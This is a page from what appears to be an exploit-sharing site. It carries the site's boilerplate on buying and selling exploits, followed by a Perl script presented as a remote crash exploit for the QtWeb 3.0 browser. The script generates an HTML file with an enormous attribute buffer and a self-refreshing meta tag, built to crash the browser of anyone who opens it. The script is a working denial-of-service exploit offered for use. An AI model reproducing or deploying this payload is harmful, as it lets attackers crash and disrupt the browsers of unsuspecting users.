0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
QtWeb 3.0 Remote DoS/Crash Exploit
==================================== QtWeb 3.0 Remote DoS / Crash Exploit ==================================== #!/usr/bin/perl # File Name :QtWeb Web Browser # Vuln : Remote Dos/Crash # # Look at the task manager after u run this ##==------>> # # Exploit Title: QtWeb 3.0 Remote DoS/Crash Exploit # Site : http://www.qtweb.net/ # Software Link: http://qtweb.googlecode.com/files/QtWeb-3.0.zip # Version: v 3.0 # Tested on: Windows XP Sp2 / .html was uploaded into a Ubuntu Server # Also tested locally # ##==------>> $file="zero_qbrwoser.html"; print " ======================================\n"; print " = QtWeb 3.0 Remote DoS/Crash Exploit =\n"; print " = =\n"; print " ======================================\n"; print "\n"; print " Please Wait till c0de generate...\n"; my $buffer="\x41" x 100000000; #Buffer my $buffer_1="\42" x 55900000; my $tit="\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72"; # lol on this open(myfile,">>$file"); # b00m on here print myfile "<html>"; print myfile "<title> y0u just got owned by $tit </title>"; print myfile '<head><meta http-equiv="refresh" content="1; url=zero_qbrwoser.html"></head>'; print myfile "<body alink="; print myfile $buffer,$buffer_1; print myfile '">'; print myfile "</html>"; close(myfile); print "\n"; print " File Name : $file\n"; print " File Created Succesfully \n"; print "\n"; print "----------------------------------------------------------------------\n"; print " Founder : $tit\n"; # 0day.today [2024-11-15] #